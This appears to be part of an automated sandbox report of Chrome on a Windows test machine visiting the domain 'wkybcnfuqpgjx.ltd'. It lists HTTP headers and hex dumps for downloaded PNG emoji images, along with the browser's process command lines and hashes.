                                  2025-01-12 00:04:06 UTC1300INData Raw: 2f d4 6c 61 68 4d 80 85 e9 ba dd 7d c2 1a 20 3f b8 29 03 d2 94 2e 80 1d 19 90 ae a4 21 ac cc 9c 1f 2f cc 55 8a c5 5a 2a 63 b5 4f 50 0b ac c0 ac 9c de 9c ad cf 6c ed ef ab 9c 19 be f6 d1 f0 65 6b ec cc e3 a7 c6 aa 0e 75 2c 2b 3f 90 cb f4 d2 e7 f4 e6 00 50 61 11 29 91 1e d2 44 e2 22 4a 78 12 d2 c3 c3 e0 5d 39 3f 3e 3e 3d eb e1 b6 4b 50 00 e0 9c b4 6e 77 e8 da f2 8b af 5c 1a 86 4c 61 92 a3 1c 9b 74 9c dc 75 b7 c1 be 5c 09 a8 54 ca 26 52 5a 48 9a 09 25 4a 41 28 07 06 0e f8 13 6f 16 e6 b4 df c6 31 68 05 16 ef 9e 1f dc f4 a5 6d 3f fe 4d ed c8 9d fb bb cf 4e b8 1c 1f dc 37 c0 6d dd 39 4a c5 d9 49 e2 68 09 5a 12 06 55 c2 dc 77 82 fa 59 4e b7 4f 10 b4 99 2a 5c 15 f9 e8 bd 92 31 53 92 f3 b7 2f b8 f5 0d 02 c5 e9 c9 b5 4f c5 2a 54 ca b9 bb eb 9e 9f ae f4 ea e0 64 d5
                                  Data Ascii: /lahM} ?).!/UZ*cOPleku,+?Pa)D"Jx]9?>>=KPnw\Latu\T&RZH%JA(o1hm?MN7m9JIhZUwYNO*\1S/O*Td


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  148192.168.2.650128172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:05 UTC370OUTGET /img-apple-160/1f1e7-1f1ea.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:05 UTC894INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:05 GMT
                                  Content-Type: image/png
                                  Content-Length: 3139
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-c43"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2BSm1BXNpubRG2pr6u1j16REboX9Oo48kcRsdJbWix7qByWcgr8t3ydLw5YqKz%2FfoT1aC0vGIDXhf9JjVhr7SXd2ENsV4FS0JRvb5lmXUodWezCLK5ILQmEuCow2yfbwpUvJnw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e31f4c9e4316-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=948&delivery_rate=1821584&cwnd=178&unsent_bytes=0&cid=db0c09a829079809&ts=145&x=0"
                                  2025-01-12 00:04:05 UTC475INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 81 61 41 cf c7 82 59 35 2e cf c6 81 9c 6b 5c 66 0f 15 81 6c 47 4f 0a 11 c3 66 6e 6f 6b 4f ce c6 81 65 0b 12 84 7a 2a 07 07 07 79 13 17 c2 61 68 5b 5b 5b a6 1d 28 cf c7 82 04 04 04 c6 6b 71 82 78 2a c0 52 5a 60 60 60 7a 0f 16 0a 0a 0a c3 67 6e 00 00 00 ce c6 81 2c 2c 2c c4 68 6f 09 09 08 cf c7 82 77 0d 16 84 7a 2b 63 63 63 04 04 07 c3 64 6b 52 52 52 78 0e 16 ce c5 80 65 65 65 07 07 07 84 7a 2b cf c9 82 cf c7 82 07 07 07 64 64 64 80 13 1b 05 05 05 c3 67 6e 83 7a 2a 63 63 63 0d 0d 0d ce c5 80 77 0d 16 ca 6e 75 84 7b 2b 2f 2f 2f 08 08 08 cf c7 82 60 61 62 cd c4 7f c0 61 68 01 01 01 78 0d 15 84 7a 2a fc f3 52 ff f0 4e ff ec 54 ff
                                  Data Ascii: PNGIHDRPLTEGpLaAY5.k\flGOfnokOez*yah[[[(kqx*RZ```zgn,,,howz+cccdkRRRxeeez+dddgnz*cccwnu{+///`abahxz*RNT
                                  2025-01-12 00:04:05 UTC1369INData Raw: 49 ec 2f 3f da 37 42 bb 44 4c f5 2a 39 68 68 65 f5 27 37 f1 28 38 cc 39 34 f2 25 35 ee 25 34 cb 34 3f ef 23 32 e8 26 34 f9 1c 3a d2 2f 3c dd 2a 38 ed 22 31 60 60 60 f4 1b 39 b7 38 42 ec 1f 2e e9 20 2e e9 1c 2c 5b 5b 5b e4 1e 2d e0 20 2d b6 33 35 e2 1e 2c e6 1c 2b d4 24 31 da 20 2e e7 1a 2a de 1e 2d b7 2e 38 e1 1b 2a e5 19 28 d7 1f 2d dd 1b 29 e2 18 27 56 56 56 cf 20 2e cc 20 2e e2 16 26 de 17 26 e0 15 24 d3 19 27 d9 16 24 df 13 22 dc 14 23 51 51 50 dd 12 21 da 13 22 aa 28 2d bc 1f 2b db 11 20 c7 19 27 d5 13 21 d9 11 1f d9 0e 1e d5 0f 1e d7 0e 1d d7 0d 1c d5 0d 1b 4a 4a 4a d3 0d 1c ab 1e 27 ce 0e 1d d1 0c 1b a7 1e 29 b9 15 22 c5 0e 1c 43 43 43 9d 19 23 b6 0d 1a a8 10 1b 3d 3d 3c 8c 1a 21 a0 0c 18 91 11 1b 36 36 35 83 13 1c 8b 0a 14 7c 0f 17 2f 2f 30 30 2f
                                  Data Ascii: I/?7BDL*9hhe'7(894%5%44?#2&4:/<*8"1```98B. .,[[[- -35,+$1 .*-.8*(-)'VVV . .&&$'$"#QQP!"(-+ '!JJJ')"CCC#==<!665|//00/
                                  2025-01-12 00:04:05 UTC1295INData Raw: 0c 03 d4 df 1a 42 00 ee 88 1d 93 55 b5 13 23 15 5a 96 d9 0d 67 04 1b 81 83 08 14 d6 6a e6 b0 17 61 16 9a 1d 4c 33 a2 ef 26 8a 45 87 79 a0 f7 3c 1c 37 7d c1 3e 01 35 c3 eb 6e 98 2e d3 49 b7 7e e5 f5 cf f7 29 5c c2 1c 68 b9 5e 18 41 b2 31 00 89 f6 c0 8a 0e fc 7d 1b 06 4c 23 5b a5 20 0a 79 97 af 3a 03 64 3b 9a d2 e8 74 f5 29 28 bb 1f 9a 8e eb b1 f4 a2 79 b3 a0 b1 69 fb c8 4c f4 a7 10 17 70 e5 32 05 ae c7 98 4a 23 24 c9 34 b4 e7 74 bd 8e 50 a1 e1 c7 75 16 24 a5 c8 33 71 eb 8b cc d4 e3 85 1c 77 16 cc c4 e4 e5 9c ce c0 e6 05 bd 19 d3 48 81 91 8f c4 ae c0 81 da c1 3d 53 6c 4d 24 f0 cf 6e 39 3c 26 82 06 9c f8 16 37 c8 4a e5 80 e3 f1 dd 2d e5 97 ef 2c c6 6f cf ed 0f 0a 92 33 cc c3 4b 1a 98 69 c4 94 08 fa 24 d7 4f 92 71 2f 41 99 33 e4 b5 ab c3 4f ec b0 26 f7 64 78
                                  Data Ascii: BU#ZgjaL3&Ey<7}>5n.I~)\h^A1}L#[ y:d;t)(yiLp2J#$4tPu$3qwH=SlM$n9<&7J-,o3Ki$Oq/A3O&dx


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  149192.168.2.650127172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:05 UTC608OUTGET /img-apple-160/1f1e7-1f1f6.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:06 UTC910INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:06 GMT
                                  Content-Type: image/png
                                  Content-Length: 4912
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1330"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2FgD%2BVtG6DAtmse5j9cuB4fWgoV1SCzn6nIFXc0q30cGli9wsKMroJeq0X%2B%2Bg%2B5iULJ8Fh%2BpgATXbYkQ0AuKZkrl9cvN2Qiv8FsG6s9mOVhK5Q%2FXCQbuEsaLuVSBB%2FS%2BeBatWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e31f5a817ce7-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1772&rtt_var=672&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1186&delivery_rate=1617728&cwnd=199&unsent_bytes=0&cid=25a19f929cfb25f2&ts=636&x=0"
                                  2025-01-12 00:04:06 UTC459INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 91 91 91 93 93 93 98 98 98 a9 a9 a9 b9 b9 b9 c6 c6 c6 cd cd cd cf cf cf d1 d1 d1 d3 d3 d3 d5 d5 d5 d6 d6 d6 d7 d7 d7 d9 d9 d9 da da da db db db dd dd dd df df df e0 e0 e0 e1 e1 e1 e2 e2 e3 e4 e4 e3 e6 e5 e5 e6 e6 e7 e8 e8 e8 ea e9 e9 eb eb eb ed ed ed ee ee ef ef ef f0 f0 f0 f1 f1 f1 f1 f2 f2 f3 f3 f3 f3 f4 f4 f4 f5 f5 f5 f6 f6 f6 f7 f7 f7 f8 f8 f8 f9 f9 f9 fa fa fa fb fb fb fc fc fc fe fd fd ff ff ff ab b8 d5 38 56 99 b9 c2 d6 ff ff fe cd d3 e2 2a 4b 93 9a a8 c5 a1 ad c8 cc c5 a6 df af b1 d5 5f 66 d5 4d 55 e2 9d a1 ed f6 f6 dd 91 96 dc 85 8b ed db dc f3 f9 f9 f5 fc fc e6 c4 c6 d8 6a 71 cb 22 2c cd 29 33 d0 2d 37 d3 3b 44 eb
                                  Data Ascii: PNGIHDRPLTEGpL8V*K_fMUjq",)3-7;D
                                  2025-01-12 00:04:06 UTC1369INData Raw: c8 bf cc cc cc ce ce ce c8 c9 ca cb cb ca c3 c3 c3 c0 c0 c1 bd bd be 16 16 16 10 10 10 09 09 09 3a 3a 3a b6 b6 b7 1e 1e 1e 00 00 00 28 28 28 ad ae b0 77 8a b2 db 7d 83 de 76 7c 90 7d 1e 8d 7a 1d 8d 7a 1e 94 80 21 a4 8f 23 b3 9b 26 bf a5 29 c8 ae 2c cd b2 2e d0 b4 2e d1 b6 30 d4 b8 31 d7 bb 33 da be 36 dd c2 38 e1 c5 3e e5 c9 41 e3 cb 52 d9 c4 5c d1 bf 66 c8 ba 76 c4 b5 6d bd af 6b b8 aa 64 c4 b2 5a cf ba 55 d4 bb 42 cb b4 44 bd aa 4b 92 a1 c2 13 35 7f 16 38 82 19 3a 83 1a 3c 85 1c 3e 88 1e 40 8a 20 42 8b 21 43 8c 22 44 8e 24 46 90 25 47 91 28 49 91 28 4a 93 29 4b 95 2a 4c 96 2b 4d 97 2b 4d 96 4b 4b 4b 6f 70 71 80 80 80 86 86 86 8c 8c 8b 91 91 91 a1 a2 a3 43 44 46 78 79 79 65 65 66 59 59 59 31 31 31 18 37 7a 17 2e 5f 1e 37 6d 22 3d 78 27 44 84 27 47 8c 23
                                  Data Ascii: :::(((w}v|}zz!#&),..01368>AR\fvmkdZUBDK58:<>@ B!C"D$F%G(I(J)K*L+M+MKKKopqCDFxyyeefYYY1117z._7m"=x'D'G#
                                  2025-01-12 00:04:06 UTC1369INData Raw: 44 1a 81 48 87 ae 90 f6 21 a5 37 5a 5c cd a8 a6 bd 9a a6 9b ba a6 09 41 20 90 0b 90 5a 04 f9 c0 47 dd 0f b5 ac f8 71 2c be 9c fd b1 24 a4 67 ad 23 9d e3 a0 02 26 10 49 f2 9a c4 cd 58 28 86 d8 f3 77 3e 77 a7 24 06 c0 f8 09 57 d3 9e b6 39 47 81 63 8b 74 23 75 87 89 c9 3e c1 48 be fc df 53 50 c1 16 02 c8 2c c8 04 3e 41 00 f5 55 bd ae 45 0a d6 bf 5b 82 99 54 ad e7 f6 0a a7 d7 cc f3 ae c3 65 2c f4 fb 0f 5e 3d 5a 67 64 41 20 00 66 06 4e 9e 3c 09 e0 de 7b 6f bf 17 36 f3 e6 dd 31 4f 48 62 26 6e 85 36 ee 13 48 19 35 f2 cb 94 7e 9b 90 06 11 48 c7 4d d3 96 b2 01 45 f6 04 83 62 04 e1 24 01 84 53 b7 bb 63 03 e9 2d e8 8d bc 1b 36 fe 10 67 0e d0 bf 56 15 d5 03 84 36 95 97 4b 8d 59 65 24 a1 a0 ac 09 06 76 c0 de bb da 35 07 50 dd b8 9b c9 06 99 03 ec 28 43 0d 35 f7 3d 29
                                  Data Ascii: DH!7Z\A ZGq,$g#&IX(w>w$W9Gct#u>HSP,>AUE[Te,^=ZgdA fN<{o61OHb&n6H5~HMEb$Sc-6gV6KYe$v5P(C5=)
                                  2025-01-12 00:04:06 UTC1369INData Raw: 01 00 3a 9d af 2f 01 c3 c3 c0 b8 e9 ea d7 a3 b7 04 11 37 27 8f d1 ef 72 12 99 69 11 3c 48 de 46 04 68 8f 6c 19 5b 20 e1 41 49 6d eb 2d 21 a0 17 05 61 51 04 db 19 80 3e ea 15 b4 c1 12 af 90 1d e1 b5 16 e5 59 70 21 84 d3 96 47 2f 6c d4 8c 24 ea 13 64 9b 4a 30 08 36 5f 47 6e ad 96 fa e7 d0 4e 25 f9 1d 78 50 ec da db 2c 03 bd 2c 08 b9 85 a8 ac 22 49 b1 38 31 64 58 00 92 3f 0d 6f d2 c1 16 19 f7 d4 6a 4f 14 78 7e 27 1f bd 44 17 00 7a 77 88 91 fc c5 04 63 bc 06 0e 35 1d 66 36 92 82 59 f0 45 56 53 d3 e1 23 10 72 92 28 3e 2f e9 e8 89 71 37 15 29 bf de 16 e4 90 44 e4 84 06 4e c4 0f 7d f2 47 ab 99 d9 3a 74 98 61 13 9a bf f9 ba 6b 9c 22 d1 f8 ad b3 4d c2 37 20 88 e4 18 7a bb 56 87 c3 a7 fb 9b c9 1c 2a 61 63 1e 63 8a 5d 98 50 aa 46 78 ee 7a 03 f8 66 04 fb fe 00 f5 9f
                                  Data Ascii: :/7'ri<HFhl[ AIm-!aQ>Yp!G/l$dJ06_GnN%xP,,"I81dX?ojOx~'Dzwc5f6YEVS#r(>/q7)DN}G:tak"M7 zV*acc]PFxzf
                                  2025-01-12 00:04:06 UTC346INData Raw: 9b 58 84 67 3f f8 79 79 b9 4e 44 ed 05 51 4b 6d 79 0c 6d 1a 0a 17 62 db 2c 28 36 dc 4b 61 c9 32 c2 ca 2b 3b 33 c4 2b b7 c6 fa 2e 03 83 83 05 99 46 ef b9 62 97 7c 61 f5 5d 58 a6 5c c2 8e 9d 7f 42 2d 80 11 f0 71 cc fc d8 da dc ca b8 68 af 0c 07 a8 65 93 d4 2e fb fd 4a 0e 16 fc 00 30 63 eb 1f 59 ca 6a 2e c0 b5 02 f2 5c b9 4f 61 33 4c fd 98 87 81 41 47 07 a1 09 b6 59 5a 6c f9 92 5f 9a c5 af a1 bb cc 8d 69 b1 ff 09 12 dc 47 b2 ff 43 80 50 37 5d 47 77 31 a0 ff 57 fd 91 c6 51 a8 99 92 92 1a 16 f0 95 7b 39 e4 c7 d6 7d 47 6c 4a 17 54 e2 df db 0f 2f 38 f5 c6 32 bf c2 f9 c7 cf 3b 51 70 a2 00 00 0e c2 5b 86 fe 12 7d 90 8b 96 94 ca d7 d0 e3 50 3b f1 16 5d e8 ca ce 13 7c 44 49 a6 61 b5 6b 37 9f c2 fe 90 9e 5d 41 c5 4c 4d 5c fa 07 47 d2 cf 31 10 9e 9f cf 45 ce 90 f6 32
                                  Data Ascii: Xg?yyNDQKmymb,(6Ka2+;3+.Fb|a]X\B-qhe.J0cYj.\Oa3LAGYZl_iGCP7]Gw1WQ{9}GlJT/82;Qp[}P;]|DIak7]ALM\G1E2


                                  Click to jump to process

                                  Click to jump to process

                                  Click to jump to process

                                  Target ID:1
                                  Start time:19:03:31
                                  Start date:11/01/2025
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                  Imagebase:0x7ff684c40000
                                  File size:3'242'272 bytes
                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:3
                                  Start time:19:03:32
                                  Start date:11/01/2025
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=2104,i,16676233379117246194,8042529587182153952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                  Imagebase:0x7ff684c40000
                                  File size:3'242'272 bytes
                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:4
                                  Start time:19:03:38
                                  Start date:11/01/2025
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://wkybcnfuqpgjx.ltd/"
                                  Imagebase:0x7ff684c40000
                                  File size:3'242'272 bytes
                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:5
                                  Start time:19:03:44
                                  Start date:11/01/2025
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5532 --field-trial-handle=2104,i,16676233379117246194,8042529587182153952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                  Imagebase:0x7ff684c40000
                                  File size:3'242'272 bytes
                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  No disassembly